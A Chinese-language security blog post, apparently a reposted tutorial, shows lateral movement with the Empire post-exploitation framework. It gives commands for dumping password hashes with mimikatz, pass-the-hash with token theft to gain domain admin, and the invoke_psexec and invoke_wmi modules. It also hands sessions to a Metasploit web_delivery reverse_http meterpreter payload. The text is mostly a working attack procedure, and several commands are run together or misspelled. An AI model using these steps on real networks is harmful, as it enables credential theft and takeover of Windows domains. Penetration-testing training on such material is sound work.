【Empire系列完结】横向移动相关

  • A+
所属分类:安全文章

#001 获取密码hash


1、内置mimikatz

mimikatz    #执行会有点缓慢,执行成功即可抓取hash

【Empire系列完结】横向移动相关



2、creds命令:

creds

【Empire系列完结】横向移动相关


creds<空格>+<双击tab键> 可以看到扩展命令

【Empire系列完结】横向移动相关


当内网很复杂,hash很多时,可以通过export导出为csv文件

crds export /root/hash    #会自动添加文件后缀

【Empire系列完结】横向移动相关


结果如下:

【Empire系列完结】横向移动相关



#002 横向移动模块

1、令牌窃取配合hash传递:

①执行mimikatz后

creds    #列出所有Empire获取到的密码

【Empire系列完结】横向移动相关


②当发现列举出的creds中,有域高权限用户时,使用hash传递方式攻击:

pth

【Empire系列完结】横向移动相关


然后就能看见PID号,窃取该PID进程的令牌即可

steal_token

【Empire系列完结】横向移动相关

即可成功获取域管权限



2、横向移动常用模块:

①invoke-psexec:

usemodule lateral_movement/invoke_psexecset ComputerName <目标计算机名>set Listener <监听器名称>

【Empire系列完结】横向移动相关

成功会返回目标机器的agent会话



②invoke-wmi:

usemodule lateral_movement/invoke_wmiset ComputerName <目标计算机名>set Listener <监听器名称>

【Empire系列完结】横向移动相关

成功会返回目标机器的agent会话



③其他模块根据实际情况选用即可

usemodule lateral_movement/    #tab键列出模块

【Empire系列完结】横向移动相关




#003  转为MSF会话

Invoke-MetasploitPayload<-->web_delivery(MSF):

①MSF执行

use exploit/multi/script/web_deliveryset target 2set payload windows/meterpreter/reverse_httpset lhostset lpotr <监听端口>exploit

【Empire系列完结】横向移动相关



②Empire执行:

usemodule code_execution/invoke_metasploitpayloadset URLexecute

【Empire系列完结】横向移动相关


执行成功后,MSF会上线一个新的meterpreter会话

【Empire系列完结】横向移动相关





☆ END ☆

点个赞和在看吧,欢迎转发!

【Empire系列完结】横向移动相关



本文始发于微信公众号(哈拉少安全小队):【Empire系列完结】横向移动相关

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: